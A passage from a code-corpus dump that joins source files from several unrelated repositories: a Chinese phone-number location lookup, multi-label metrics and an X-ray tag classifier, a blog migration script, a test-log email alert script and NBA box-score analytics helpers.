float_string_list.append(self.traditional_num_char[i])
float_string = ''.join(float_string_list)
return float_string
```
#### File: jionlp/gadget/phone_location.py
```python
import re
from jionlp.rule.rule_pattern import CELL_PHONE_CHECK_PATTERN, \
LANDLINE_PHONE_CHECK_PATTERN, LANDLINE_PHONE_AREA_CODE_PATTERN
from jionlp.dictionary.dictionary_loader import phone_location_loader, \
telecom_operator_loader
from jionlp.gadget.trie_tree import TrieTree
class PhoneLocation(object):
""" 对于给定的电话号码,返回其归属地、区号、运营商等信息。
该方法与 jio.extract_phone_number 配合使用。
Args:
text(str): 电话号码文本。若输入为 jio.extract_phone_number 返回的结果,效果更佳。
注意,仅输入电话号码文本,如 "86-17309729105"、"13499013052"、"021 60128421" 等,
而 "81203432" 这样的电话号码则没有对应的归属地。
若输入 "343981217799212723" 这样的文本,会造成误识别,须首先从中识别电话号码,再进行
归属地、区号、运营商的识别
Returns:
dict: 该电话号码的类型,归属地,手机运营商
Examples:
>>> import jionlp as jio
>>> text = '联系电话:13288568202. (021)32830431'
>>> num_list = jio.extract_phone_number(text)
>>> print(num_list)
>>> res = [jio.phone_location(item['text']) for item in num_list]
>>> print(res)
# [{'text': '13288568202', 'offset': (5, 16), 'type': 'cell_phone'},
{'text': '(021)32830431', 'offset': (18, 31), 'type': 'landline_phone'}]
# {'number': '(021)32830431', 'province': '上海', 'city': '上海', 'type': 'landline_phone'}
# {'number': '13288568202', 'province': '广东', 'city': '揭阳',
'type': 'cell_phone', 'operator': '中国联通'}
"""
def __init__(self):
self.cell_phone_location_trie = None
def _prepare(self):
""" 加载词典 """
cell_phone_location, zip_code_location, area_code_location = phone_location_loader()
self.zip_code_location = zip_code_location
self.area_code_location = area_code_location
self.cell_phone_location_trie = TrieTree()
for num, loc in cell_phone_location.items():
self.cell_phone_location_trie.add_node(num, loc)
self.cell_phone_pattern = re.compile(CELL_PHONE_CHECK_PATTERN)
self.landline_phone_pattern = re.compile(LANDLINE_PHONE_CHECK_PATTERN)
self.landline_area_code_pattern = re.compile(LANDLINE_PHONE_AREA_CODE_PATTERN)
# 运营商词典
telecom_operator = telecom_operator_loader()
self.telecom_operator_trie = TrieTree()
for num, loc in telecom_operator.items():
self.telecom_operator_trie.add_node(num, loc)
def __call__(self, text):
""" 输入一段电话号码文本,返回其结果 """
if self.cell_phone_location_trie is None:
self._prepare()
res = self.cell_phone_pattern.search(text)
if res is not None: # 匹配至手机号码
cell_phone_number = res.group()
first_seven = cell_phone_number[:7]
_, location = self.cell_phone_location_trie.search(first_seven)
province, city = location.split(' ')
# print(province, city)
_, operator = self.telecom_operator_trie.search(cell_phone_number[:4])
return {'number': text, 'province': province, 'city': city,
'type': 'cell_phone', 'operator': operator}
res = self.landline_phone_pattern.search(text)
if res is not None: # 匹配至固话号码
# 抽取固话号码的区号
res = self.landline_area_code_pattern.search(text)
if res is not None:
area_code = res.group(1)
province, city = self.area_code_location.get(area_code, ' ').split(' ')
if province == '':
province, city = None, None
return {'number': text, 'province': province,
'city': city, 'type': 'landline_phone'}
else:
return {'number': text, 'province': None,
'city': None, 'type': 'landline_phone'}
return {'number': text, 'province': None,
'city': None, 'type': 'unknown'}
def landline_phone_location(self, phone_num):
""" 检索固定电话号码城市区号并返回,即已知输入是固话号码 """
if self.cell_phone_location_trie is None:
self._prepare()
# 抽取固话号码的区号
res = self.landline_area_code_pattern.search(phone_num)
if res is not None:
area_code = res.group(1)
province, city = self.area_code_location.get(area_code, ' ').split(' ')
if province == '':
province, city = None, None
return {'number': phone_num, 'province': province,
'city': city, 'type': 'landline_phone'}
else:
return {'number': phone_num, 'province': None,
'city': None, 'type': 'landline_phone'}
def cell_phone_location(self, phone_num):
""" 检索手机号码城市区号并返回,即已知输入是手机号 """
if self.cell_phone_location_trie is None:
self._prepare()
res = self.cell_phone_pattern.search(phone_num)
cell_phone_number = res.group()
first_seven = cell_phone_number[:7]
_, location = self.cell_phone_location_trie.search(first_seven)
province, city = location.split(' ')
_, operator = self.telecom_operator_trie.search(cell_phone_number[:4])
return {'number': phone_num, 'province': province, 'city': city,
'type': 'cell_phone', 'operator': operator}
```
#### File: jionlp/util/zip_file.py
```python
import os
import shutil
import zipfile
FILE_PATH = os.path.abspath(__file__)
DIR_PATH = os.path.dirname(os.path.dirname(FILE_PATH))
UNZIP_FILE_LIST = [
'china_location.txt', 'chinese_char_dictionary.txt',
'chinese_idiom.txt', 'chinese_word_dictionary.txt',
'idf.txt',
'pinyin_phrase.txt', 'sentiment_words.txt',
'char_distribution.json', 'word_distribution.json',
'word_topic_weight.json', 'topic_word_weight.json',
'phone_location.txt', 'xiehouyu.txt',
'pornography.txt']
ZIP_FILE_LIST = [
'china_location.zip', 'chinese_char_dictionary.zip',
'chinese_idiom.zip', 'chinese_word_dictionary.zip',
'idf.zip',
'pinyin_phrase.zip', 'sentiment_words.zip',
'char_distribution.zip', 'word_distribution.zip',
'word_topic_weight.zip', 'topic_word_weight.zip',
'phone_location.zip', 'xiehouyu.zip',
'pornography.zip']
def zip_file(file_list=None):
""" 将某些 txt, json 文件压缩 """
if file_list is None:
file_list = UNZIP_FILE_LIST
elif type(file_list) is str:
file_list = [file_list]
dict_dir_path = os.path.join(DIR_PATH, 'dictionary')
for _file in file_list:
dict_file_path = os.path.join(dict_dir_path, _file)
tmp_file_path = os.path.join(os.getcwd(), _file)
shutil.copyfile(dict_file_path, tmp_file_path)
zip_file_name = _file.split('.')[0] + '.zip'
with zipfile.ZipFile(os.path.join(dict_dir_path, zip_file_name),
'w', zipfile.ZIP_DEFLATED) as zf:
# zf.write(os.path.join(dict_dir_path, _file))
zf.write(_file)
os.remove(tmp_file_path)
def unzip_file(file_list=None):
""" 将某些 txt 文件解压缩 """
if file_list is None:
file_list = ZIP_FILE_LIST
elif type(file_list) is str:
file_list = [file_list]
dict_dir_path = os.path.join(DIR_PATH, 'dictionary')
for _zip_file in file_list:
zip_file_path = os.path.join(dict_dir_path, _zip_file)
with zipfile.ZipFile(zip_file_path, 'r') as zf:
assert len(zf.namelist()) == 1
for _file in zf.namelist():
zf.extract(_file, dict_dir_path)
```
#### File: JioNLP/test/test_idiom_solitaire.py
```python
import unittest
import jionlp as jio
class TestIdiomSolitaire(unittest.TestCase):
""" 测试地址解析工具 """
def test_idiom_solitaire(self):
""" test func idiom_solitaire """
idiom = '道阻且长'
idiom = jio.idiom_solitaire(idiom, same_pinyin=False, same_tone=True)
self.assertEqual(idiom[0], '长')
idiom = jio.idiom_solitaire('', same_pinyin=False, same_tone=True)
self.assertEqual(idiom, '')
if __name__ == '__main__':
suite = unittest.TestSuite()
test_idiom_solitaire = [TestIdiomSolitaire('test_idiom_solitaire')]
suite.addTests(test_idiom_solitaire)
runner = unittest.TextTestRunner(verbosity=1)
runner.run(suite)
``` |
{
"source": "Ji4chenLi/medical_images",
"score": 2
} |
#### File: Ji4chenLi/medical_images/evaluation_metrics.py
```python
from abc import ABC
from typing import Optional, Sequence, TypeVar
from sklearn.metrics import roc_auc_score
import numpy as np
from texar.torch.run.metric.base_metric import SimpleMetric, StreamingMetric
Input = TypeVar('Input')
Value = TypeVar('Value')
class MultiLabelStreamingMetric(StreamingMetric[Input, Value]):
r"""Base class of multi-label streaming metrics
that support incremental computation.
Keyword Args:
num_label (int): Number of labels in total
pred_name (str): Name of the predicted value. This will be used as the
key to the dictionary returned by the model.
label_name (str): Name of the label. This will be used as the key to the
batch object returned by the dataset. Defaults to ``"label"``.
"""
def __init__(self, num_label: int, *args, **kwargs) -> None:
self.num_label = num_label
super().__init__(*args, **kwargs)
def value(self) -> Value:
raise NotImplementedError
class _MultiLabelConfusionMatrix(MultiLabelStreamingMetric[Input, Value], ABC):
r"""Please refer details to ``sklearn.metrics.multilabel_confusion_matrix``
"""
tp_sum: np.array
pred_sum: np.array
true_sum: np.array
matrix: np.array
def reset(self) -> None:
super().reset()
self.matrix = None
self.tp_sum = np.zeros(self.num_label)
self.pred_sum = np.zeros(self.num_label)
self.true_sum = np.zeros(self.num_label)
def add(self, predicted: Sequence[Input], labels: Sequence[Input]) -> None:
r"""Update the confusion matrix using the results calculated for
the current batch. Specifically, update
self.tp_sum (total number of TP for each label)
self.pred_sum (total number of TP + FP for each label)
self.true_sum (total number of TP + FN for each label)
Keyword Args:
predicted: One-hot representation of the predicted results.
Dimension [batch size, num_label]
label_name: One-hot representation of the target labels.
Dimension [batch size, num_label]
"""
super().add(predicted, labels)
predicted = np.array(predicted)
labels = np.array(labels)
sum_axis = 0
true_and_pred = predicted * labels
self.tp_sum += np.sum(true_and_pred, axis=sum_axis)
self.pred_sum += np.sum(predicted, axis=sum_axis)
self.true_sum += np.sum(labels, axis=sum_axis)
fp = self.pred_sum - self.tp_sum
fn = self.true_sum - self.tp_sum
tp = self.tp_sum
tn = self.count - tp - fp - fn
self.matrix = np.array([tn, fp, fn, tp]).T.reshape(-1, 2, 2)
def _safe_divide(self, numerator: np.ndarray, denominator: np.ndarray) \
-> np.ndarray:
# Credit: sklearn.metrics.classification._prf_divide
if numerator.size == 1:
if denominator == 0.0:
return np.array(0.0)
return numerator / denominator
mask = denominator == 0.0
denominator = denominator.copy()
denominator[mask] = 1.0
value = numerator / denominator
return value
class MultiLabelConfusionMatrix(
_MultiLabelConfusionMatrix[Input, Optional[np.ndarray]]
):
r"""The confusion matrix is an evaluation metric for
multi-label classification tasks.
The value are averaged across different labels, with matrix[0, 0] represents
TN, matrix[0, 1] represents FP, matrix[1, 0] represents FN,
and matrix[1, 1] represents TP.
Keyword Args:
num_label (int): Number of labels in total
pred_name (str): Name of the predicted value. This will be used as the
key to the dictionary returned by the model.
label_name (str): Name of the label. This will be used as the key to the
batch object returned by the dataset. Defaults to ``"label"``.
"""
def value(self) -> Optional[np.ndarray]:
# Dimension of self.matrix: [num_label]
return np.mean(self.matrix, axis=0)
def better(self, cur: Value, prev: Value) -> Optional[bool]:
# Always return `None` to indicate values are uncomparable.
return None
class MultiLabelPrecision(
_MultiLabelConfusionMatrix[Input, Optional[np.ndarray]]
):
r"""The precision metric for multi-label classification tasks. Precision is
defined as the ratio of ``tp / (tp + fp)``, where ``tp`` is the number of
true positives and ``fp`` is the number of false positives.
The value are averaged across different labels.
MultiLabelPrecision values are :class:`float` numbers between 0 and 1,
with higher values being better.
Keyword Args:
num_label (int): Number of labels in total
pred_name (str): Name of the predicted value. This will be used as the
key to the dictionary returned by the model.
label_name (str): Name of the label. This will be used as the key to the
batch object returned by the dataset. Defaults to ``"label"``.
"""
def value(self) -> float:
if self.count == 0:
return np.zeros(self.num_label).mean()
numerator = self.matrix[:, 1, 1] # tp
denominator = self.matrix[:, 1, 1] + self.matrix[:, 0, 1] # tp + fp
value = self._safe_divide(numerator, denominator)
return value.mean()
class MultiLabelRecall(_MultiLabelConfusionMatrix[Input, Optional[np.ndarray]]):
r"""The recall metric for multi-label classification tasks. Recall is
defined as the ratio of ``tp / (tp + fn)``, where ``tp`` is the number of
true positives and ``fn`` is the number of false negatives. The value are
averaged across different labels.
MultiLabelRecall values are :class:`float` numbers between 0 and 1,
with higher values being better.
Keyword Args:
num_label (int): Number of labels in total
pred_name (str): Name of the predicted value. This will be used as the
key to the dictionary returned by the model.
label_name (str): Name of the label. This will be used as the key to the
batch object returned by the dataset. Defaults to ``"label"``.
"""
def value(self) -> float:
if self.count == 0:
return np.zeros(self.num_label).mean()
numerator = self.matrix[:, 1, 1] # tp
denominator = self.matrix[:, 1, 1] + self.matrix[:, 1, 0] # tp + fn
value = self._safe_divide(numerator, denominator)
return value.mean()
class MultiLabelF1(
MultiLabelPrecision[Input], MultiLabelRecall[Input]
):
r"""The F1 metric for multi-label classification tasks. MultiLabelF1
is defined as the harmonic mean of MultiLabelPrecision and MultiLabelRecall.
MultiLabelF1 requires both predicted values and labels.
MultiLabelF1 values are :class:`float` numbers between 0 and 1,
with higher values being better.
Keyword Args:
num_label (int): Number of labels in total
pred_name (str): Name of the predicted value. This will be used as the
key to the dictionary returned by the model.
label_name (str): Name of the label. This will be used as the key to the
batch object returned by the dataset. Defaults to ``"label"``.
"""
def value(self) -> float:
precision = MultiLabelPrecision.value(self)
recall = MultiLabelRecall.value(self)
f1 = self._safe_divide(
2 * precision * recall, precision + recall) # type: ignore
# pylint: enable=protected-access
return f1
class HammingLoss(MultiLabelStreamingMetric[Input, float]):
r"""The HammingLoss metric for label classification tasks. HammingLoss is
defined as the fraction of labels that are incorrectly predicted
HammingLoss are :class:`float`numbers between 0 and 1,
with lower values being better.
Keyword Args:
num_label (int): Number of labels in total
pred_name (str): Name of the predicted value. This will be used as the
key to the dictionary returned by the model.
label_name (str): Name of the label. This will be used as the key to the
batch object returned by the dataset. Defaults to ``"label"``.
"""
correct: np.float
def reset(self) -> None:
super().reset()
self.correct = np.zeros(self.num_label)
def add(self, predicted: Sequence[Input], labels: Sequence[Input]) -> None:
super().add(predicted, labels)
predicted = np.array(predicted)
labels = np.array(labels)
self.correct += np.sum(predicted == labels, axis=0)
def value(self):
if self.count == 0:
return np.zeros(self.num_label).mean()
return np.mean(self.count - self.correct) / self.count
class RocAuc(SimpleMetric[Input, float]):
r"""Compute Area Under the Receiver Operating
Characteristic Curve (ROC AUC) from prediction scores.
Please refer details to sklearn.metrics.roc_auc_score"""
def _value(self) -> Value:
labels = np.stack(self.labels, axis=0)
probs = np.stack(self.predicted, axis=0)
try:
score = roc_auc_score(labels, probs)
except AttributeError:
score = 0.
return score
```
#### File: medical_images/models/cv_model.py
```python
from typing import Dict, Any
import os.path as osp
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.models as tvm
# Texar Library
from texar.torch import ModuleBase
class SimpleFusionEncoder(ModuleBase):
r"""Visual feature extractor. Implementation is adapted
from
https://gitlab.int.petuum.com/shuxin.yao/image_report_generation/blob/master/implementation/Encoders/Encoders.py
Base encoder is set to be DenseNet121. Pretrained weights
are reused from https://github.com/berneylin/chexnet
NOTE: The output features are not a vector. Instead, we
treat the output from the feature layer of the densenet
as the features, and reshape it [batch size, outfeatures, -1]
"""
def __init__(self):
super().__init__()
self.cnn = tvm.densenet121(pretrained=True)
self._load_from_ckpt()
self.out_features = self.cnn.classifier.in_features
def _load_from_ckpt(self):
ckpt = './model.pth.tar'
if osp.exists(ckpt):
pretrained_weight = torch.load(ckpt)['state_dict']
new_state_dict = {}
prefix = 'module.dense_net_121.'
for k, v in pretrained_weight.items():
if 'classifier' not in k:
new_k = k[len(prefix):]
new_state_dict[new_k] = v
msg = self.cnn.load_state_dict(new_state_dict, strict=False)
assert set(msg.missing_keys) == {
"classifier.weight",
"classifier.bias"
}, set(msg.missing_keys)
else:
Warning("No pretrained model is loaded!")
def forward(self, images):
r"""
Extract visual features from the input images
Args:
images (torch.Tensor): dimension
[batch size, channels, height, width]
Returns:
res (torch.Tensor): dimension
[batch size, out_features, 49 = 7 * 7]
"""
batch_size = images.shape[0]
res = self.cnn.features(images)
res = res.view(batch_size, self.out_features, -1)
return res
class MLC(ModuleBase):
r"""Multilabel classifier
Args:
hparams (dict or HParams, optional): MLC hyperparameters.
Missing hyperparameters will be set to default values.
See :meth:`default_hparams` for the hyperparameter structure
and default values.
* fc_in_features (int): Dimension of input visual features
* num_tags (int): Number of tags in total
"""
def __init__(self, hparams=None):
super().__init__(hparams=hparams)
self.classifier = nn.Linear(
in_features=self.hparams.fc_in_features,
out_features=self.hparams.num_tags)
# As per the wingspan project
nn.init.kaiming_normal_(
self.classifier.weight, mode='fan_in')
self.classifier.bias.data.fill_(0)
def forward(self, visual_feature):
r"""Generate logits (scores) for all tags given
the input visual_feature
Args:
visual_feature (torch.Tensor): dimension
[batch size, num_visual_features, visual_dim]
Returns:
tag_scores (torch.Tensor): scores for all tags.
Dimension [batch size, num_tags]
"""
flat_feature = F.avg_pool1d(
visual_feature,
visual_feature.size(-1)
).squeeze(-1)
tag_scores = self.classifier(flat_feature)
return tag_scores
def get_tag_probs(self, visual_feature):
r"""Generate probability distributions for all tags given
the input visual_feature
Args:
visual_feature (torch.Tensor): dimension
[batch size, num_visual_features, visual_dim]
Returns:
tag_probs (torch.Tensor): probability distributions
for all tags. Dimension [batch size, num_tags]
"""
tag_scores = self.forward(visual_feature)
tag_probs = torch.sigmoid(tag_scores)
return tag_probs
@staticmethod
def default_hparams() -> Dict[str, Any]:
r"""Returns a dictionary of hyperparameters with default values.
Returns: (dict) default hyperparameters
"""
return {
'num_tags': 210,
'fc_in_features': 1024,
}
class MLCTrainer(ModuleBase):
r""" Trainer for the Multilabel classifier
Args:
hparams (dict or HParams, optional): MLCTrainer hyperparameters.
Missing hyperparameters will be set to default values.
See :meth:`default_hparams` for the hyperparameter structure
and default values.
* num_tags (int): Number of tags in total
* threshold (float): Threshold to determine if a tag is active
or not
* train_encoder (bool): indicate whether keep training
the encoder or not
"""
def __init__(self, hparams=None):
super().__init__(hparams=hparams)
self.extractor = SimpleFusionEncoder()
hparams_mlc = {
'num_tags': self.hparams.num_tags,
'fc_in_features': self.extractor.out_features,
}
self.mlc = MLC(hparams_mlc)
self.threshold = self.hparams.threshold
self.train_encoder = self.hparams.train_encoder
self.loss = nn.BCEWithLogitsLoss()
def forward(self, batch):
r"""Generate logits (scores) for all tags given
the input visual_feature
Args:
batch (tx.torch.data.Batch[str, Union[torch.Tensor, int]]):
* batch_size: batch size
* label: Dimension [batch size, num_tags]
* img_tensor: Dimension [batch size, channels, height, width]
* token_tensor: Dimension
[batch size, max_sentence_num + 1, max_word_num]
* stop_prob: Dimension [batch size, max_sentence_num + 1]
Returns:
loss (torch.float): classification loss
preds (torch.Tensor): indicators of whether a tag
is active. Dimension [batch size, num_tags]
probs (torch.Tensor): probability distributions
for all tags. Dimension [batch size, num_tags]
"""
if self.train_encoder:
visual_feature = self.extractor(batch.img_tensor)
else:
with torch.no_grad():
visual_feature = self.extractor(batch.img_tensor)
tag_scores = self.mlc(visual_feature)
loss = self.loss(tag_scores, batch.label)
probs = torch.sigmoid(tag_scores)
preds = (probs > self.threshold).to(torch.float)
return {"loss": loss, "preds": preds, "probs": probs}
@staticmethod
def default_hparams() -> Dict[str, Any]:
r"""Returns a dictionary of hyperparameters with default values.
Returns: (dict) default hyperparameters
"""
return {
'num_tags': 210,
'threshold': 0.5,
'train_encoder': False
}
if __name__ == "__main__":
m = MLCTrainer()
```
#### File: medical_images/tests/test_cv_model.py
```python
import unittest
import torch
from texar.torch.data.data.data_iterators import DataIterator
from config import transforms, pathologies
from iu_xray_data import IU_XRay_Dataset
from models.cv_model import SimpleFusionEncoder, MLC, MLCTrainer
class TestVisualModel(unittest.TestCase):
r"""
Unit test for CV Model
"""
def setUp(self):
self.batch_size = 4
self.num_label = len(pathologies)
data_hparams = {
"datasource":{
"img_root": "tests/test_iu_xray_data/iu_xray_images",
"text_root": "tests/test_iu_xray_data/text_root",
"vocab_path": "tests/test_iu_xray_data/test_vocab.txt",
"transforms": transforms,
"pathologies": pathologies,
},
"batch_size": self.batch_size,
"shuffle": False,
}
dataset = IU_XRay_Dataset(data_hparams)
dataset.to(torch.device('cpu'))
self.loader = DataIterator(dataset)
self.extractor = SimpleFusionEncoder()
mlc_hparam = {
'num_tags': len(pathologies),
}
self.mlc = MLC(mlc_hparam)
self.mlc_trainer = MLCTrainer(mlc_hparam)
self.loss = torch.nn.BCEWithLogitsLoss()
def test_visual_extractor(self):
batch = next(iter(self.loader))
img_tensor = batch.img_tensor
visual_feature = self.extractor(img_tensor)
self.assertEqual(
visual_feature.size(),
torch.Size([4, 1024, 49]))
def test_mlc(self):
batch = next(iter(self.loader))
img_tensor = batch.img_tensor
visual_feature = self.extractor(img_tensor)
pred_score = self.mlc(visual_feature)
pred_prob = self.mlc.get_tag_probs(visual_feature)
self.assertEqual(
pred_score.size(),
torch.Size([4, self.num_label])
)
self.assertTrue(
torch.equal(
torch.sigmoid(pred_score),
pred_prob
)
)
def test_mlc_trainer(self):
batch = next(iter(self.loader))
img_tensor = batch.img_tensor
label = batch.label
result = self.mlc_trainer(batch)
visual_feature = self.mlc_trainer.extractor(img_tensor)
pred_score = self.mlc_trainer.mlc(visual_feature)
pred_probs = self.mlc_trainer.mlc.get_tag_probs(visual_feature)
self.assertTrue(torch.equal(
pred_probs, result['probs']))
self.assertTrue(torch.equal(
self.loss(pred_score, label),
result['loss']))
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "Ji4n1ng/blog",
"score": 3
} |
#### File: blog/scripts/OldToNew.py
```python
import re, sys, getopt, os, shutil
def usage():
print(
"""
------- OldToNew.py Usage -------
--help: show help information
-h or --help: show help information
-s or --source: path of the source files e.g. path/to/source/
-o or --output: path of the output files e.g. path/to/output/
-----------------------------------
"""
)
def gotError(reason):
print('[Error] ' + reason)
usage()
sys.exit()
def log(information):
print('[Info] ' + information)
def createDirectory(path):
if not os.path.exists(path):
os.makedirs(path)
def getAllFileUnderDirectory(path):
if not os.path.exists(path):
gotError('path: \' ' + path + '\' not exists')
files = []
for (directoryPath, directoryNames, fileNames) in os.walk(path):
for fileName in fileNames:
if fileName.startswith('.'):
continue
filePath = os.path.join(directoryPath, fileName)
files.append((fileName, filePath))
break
return files
def oldToNew(inputSourcePath, inputOutputPath):
if not os.path.exists(inputOutputPath):
gotError('path: \' ' + inputOutputPath + '\' not exists')
files = getAllFileUnderDirectory(inputSourcePath)
for _, filePath in files:
file = open(filePath)
resultFileDate = ''
resultData = ''
for line in file:
if line.startswith('date: '):
date = line.split()
resultFileDate = date[1]
if line.startswith('thumbnail:'):
line = line.replace('thumbnail:', 'background:')
resultData += line
resultFileRootPath = os.path.join(inputOutputPath, resultFileDate)
createDirectory(resultFileRootPath)
resultFilePath = os.path.join(resultFileRootPath, 'index.md')
resultFile = open(resultFilePath, 'w+')
resultFile.write(resultData)
# if inputOutputPath == '':
# fileNameWithoutPath = os.path.split(inputSourceFileName)[1]
# fileNameWithoutExtension = removeExtension(fileNameWithoutPath)
# if '-SignatureBackward' in fileNameWithoutExtension:
# inputOutputFileName = fileNameWithoutExtension.split('-SignatureBackward')[0]
# else:
# inputOutputFileName = fileNameWithoutExtension
# inputOutputFileName += '-ResultProcessor.txt'
# inputFile = open(inputSourceFileName)
# outputFile = open(inputOutputFileName, 'w+')
# rawResultString = ''
# isFindUrlInformation = False
# for line in inputFile:
# if 'UNCOVERED Unique set :' in line:
# break
# if '--url information--' in line:
# isFindUrlInformation = True
# continue
# if isFindUrlInformation:
# rawResultString += line + '\n'
# urlPattern = r'URL\[[0-9]+\]\s:\s\w+\s(.*)'
# matchArray = re.findall(urlPattern, rawResultString)
# matchSet = set(matchArray)
# wrongSet = set()
# index = 0
# for url in matchSet:
# if not 'http' in url:
# wrongSet.add(url)
# else:
# outputFile.write('[' + str(index) + ']: ' + url + '\n\n')
# index += 1
# outputFile.write('\n\nvalid API count: ' + str(index))
# outputFile.write('\n\nwrong API count: ' + str(len(wrongSet)))
# outputFile.write('\n\nwrong API set: \n\n')
# for i, url in enumerate(wrongSet):
# outputFile.write('[' + str(i) + ']: ' + url + '\n\n')
# outputFile.write('\n\n-------------\n\n')
# outputFile.write('raw result: ' + str(len(matchArray)) + '\n')
# for i, url in enumerate(matchArray):
# outputFile.write('[' + str(i) + ']: ' + url + '\n\n')
def main(argv):
inputSourcePath = ''
inputOutputPath = ''
try:
opts, args = getopt.getopt(argv, "hs:o:", ["help", "source=", "output="])
except getopt.GetoptError:
gotError('got error when parsing args')
for opt, arg in opts:
if opt in ('-h', '--help'):
usage()
sys.exit()
elif opt in ('-s', '--source'):
inputSourcePath = arg
elif opt in ('-o', '--output'):
inputOutputPath = arg
oldToNew(inputSourcePath, inputOutputPath)
if len(sys.argv) == 1:
usage()
sys.exit(1)
if __name__ == "__main__":
main(sys.argv[1:])
``` |
{
"source": "JI511/Automated_Tasks",
"score": 3
} |
#### File: JI511/Automated_Tasks/check_log_file.py
```python
import sys
import os
import argparse
import smtplib
from email.message import EmailMessage
def main(log_path, pass_path):
my_log_path = str(log_path)
my_pass_path = str(pass_path)
if os.path.exists(my_log_path) and my_log_path.endswith('.txt') and \
os.path.exists(my_pass_path) and my_pass_path.endswith('.txt'):
try:
p_file = open(my_pass_path, 'r')
gmail_pass = p_file.read()
p_file.close()
file = open(my_log_path, 'r')
for line in file.readlines():
if 'ERROR' in line or 'FAIL' in line:
gmail_sender = '<EMAIL>'
recipient = '<EMAIL>'
subject = 'Personal_Fitness Repo Test Failure'
msg_body = 'Unit test failure!'
body = '\r\n'.join(['To: %s' % recipient,
'From: %s' % gmail_sender,
'Subject: %s' % subject,
'', msg_body])
server = smtplib.SMTP(host='smtp.gmail.com', port=587)
server.ehlo()
server.starttls()
server.login('<EMAIL>', gmail_pass)
try:
print("Attempting to send email...")
server.sendmail(gmail_sender, [recipient], body)
except:
print("There was an error")
server.quit()
sys.exit(1)
file.close()
sys.exit(0)
except Exception:
raise
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("log_path", help='The desired log file to check for unit test results.')
parser.add_argument("pass_path", help='Path to a config.txt file that stores password for gmail.')
args = parser.parse_args()
main(args.log_path, args.pass_path)
``` |
{
"source": "JI511/NBA_Beatiful_Data",
"score": 3
} |
#### File: NBA_Beatiful_Data/src/analytics_API.py
```python
import datetime
import os
import io
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.dates as plt_dates
from collections import OrderedDict
# third party imports
from basketball_reference_web_scraper import client
# relative imports
from .constants import Vars
from .team_box_score import TeamBoxScore
def get_player_box_score(name, logger, date_obj=None, timeout=3):
"""
Gets the box score for the desired player.
:param str name: Name of the player to search for.
:param logger: Logging object.
:param datetime.datetime date_obj: Datetime object for starting day to search.
:param int timeout: Number of days to search before giving up.
:return: Box score for the player if found.
:rtype: dict
"""
name = name.lower()
if date_obj is None:
date_obj = datetime.datetime.today()
bs = None
while True:
if timeout > 0:
logger.info('Attempting date: %s' % date_obj.strftime('%y-%m-%d'))
found = False
box_scores = client.player_box_scores(day=date_obj.day, month=date_obj.month, year=date_obj.year)
for box_score in box_scores:
if name in box_score['name'].lower():
bs = box_score
found = True
break
if found:
break
date_obj -= datetime.timedelta(days=1)
timeout -= 1
else:
logger.info("Timeout reached.")
break
return bs, date_obj
def get_team_box_score(team, date_obj=None, timeout=3):
"""
Gets the team box score data for a specific day.
:param str team: The team to search for.
:param datetime.datetime date_obj: Datetime object for starting day to search.
:param int timeout: Number of days to search before giving up.
:return:
"""
if date_obj is None:
date_obj = datetime.datetime.today()
team_bs = None
while True:
if timeout > 0:
team_bs = client.team_box_scores(day=date_obj.day, month=date_obj.month, year=date_obj.year)
# todo
date_obj -= datetime.timedelta(days=1)
timeout -= 1
else:
break
return team_bs
def get_daily_box_scores(date_obj=None, timeout=1):
"""
Gets all player box scores for a specific day. The default for this is only the one date specified.
:param datetime.datetime date_obj: Datetime object for starting day to search.
:param int timeout: Number of days to search before giving up.
:return: All box scores sorted by team.
:rtype: OrderedDict
"""
team_dict = OrderedDict()
if date_obj is None:
date_obj = datetime.datetime.today()
while True:
if timeout > 0:
teams = get_teams_played_on_date(date_obj=date_obj)
if len(teams) > 0:
all_box_scores = client.player_box_scores(day=date_obj.day, month=date_obj.month, year=date_obj.year)
for team in teams:
team_dict[team] = []
for player in all_box_scores:
team_dict[player['team'].name].append(player)
break
date_obj -= datetime.timedelta(days=1)
timeout -= 1
else:
break
return team_dict, date_obj
def get_teams_played_on_date(date_obj=None, timeout=1):
"""
Gets a list of all teams that played on the provided date.
:param datetime.datetime date_obj: Datetime object for starting day to search.
:param int timeout: Number of days to search before giving up.
:return: The active teams on the given date.
:rtype: list
"""
teams = []
if date_obj is None:
date_obj = datetime.datetime.today()
while True:
if timeout > 0:
team_box_scores = client.team_box_scores(day=date_obj.day, month=date_obj.month, year=date_obj.year)
if len(team_box_scores) > 1:
teams = [entry['team'].name for entry in team_box_scores]
break
date_obj -= datetime.timedelta(days=1)
timeout -= 1
else:
break
return teams
def convert_to_minutes(seconds_played):
"""
Converts seconds into minutes.
:param seconds_played:
:return: Minutes played
:rtype: float
"""
minutes = seconds_played / 60.0
return round(minutes, 2)
def get_true_shooting(points, fga, tpfga, fta):
"""
Calculates true shooting percentage.
:param int points: Points
:param int fga: Field goals attempted
:param int tpfga: Three point field goals attempted
:param int fta: Free throws attempted
:return: True shooting percentage
:rtype: float
"""
try:
ts = points / (2.0 * ((fga + tpfga) + 0.44 * fta))
except ZeroDivisionError:
ts = 0
return round(ts, 3)
def get_assist_turnover_ratio(assists, turnovers):
"""
Calculates the ratio of assists to turnovers.
:param assists: Number of assists.
:param turnovers: Number of turnovers.
:return: The ratio
:rtype: float
"""
try:
ratio = float(assists) / turnovers
except ZeroDivisionError:
ratio = float(assists)
return round(ratio, 2)
def check_supported_stats(stats):
"""
Checks a list of strings to determine if the stat type is supported.
:param stats: The stats to check.
:return: Indicates if all provided stats are acceptable.
:rtype: bool
"""
valid = True
for stat in stats:
if stat not in Vars.supported_stats:
valid = False
break
return valid
def convert_team_name(team):
"""
Converts team string into proper casing format
:param str team: Team enum name
:return: Converted string
"""
return team.title().replace('_', ' ')
# ----------------------------------------------------------------------------------------------------------------------
# Pandas interactions
# ----------------------------------------------------------------------------------------------------------------------
def get_existing_data_frame(csv_path, logger):
"""
Determines if a data frame already exists, and returns the data frame if true. Returns None if does not exist.
:param str csv_path: Path of the csv file.
:param logger: Instance of logger object.
:return: Data frame if exists, None otherwise
:rtype: pd.DataFrame
"""
df = None
if os.path.exists(csv_path):
logger.info("Existing data frame found.")
df = pd.read_csv(csv_path, index_col=0)
return df
def gather_new_on_date(date, csv, logger):
"""
Gathers new player box score data from a specific date and updates the given csv if provided.
:param datetime.datetime date: The date to search on
:param str csv: The path to the csv
:param logger: Logging object
:return: The pandas.DataFrame object
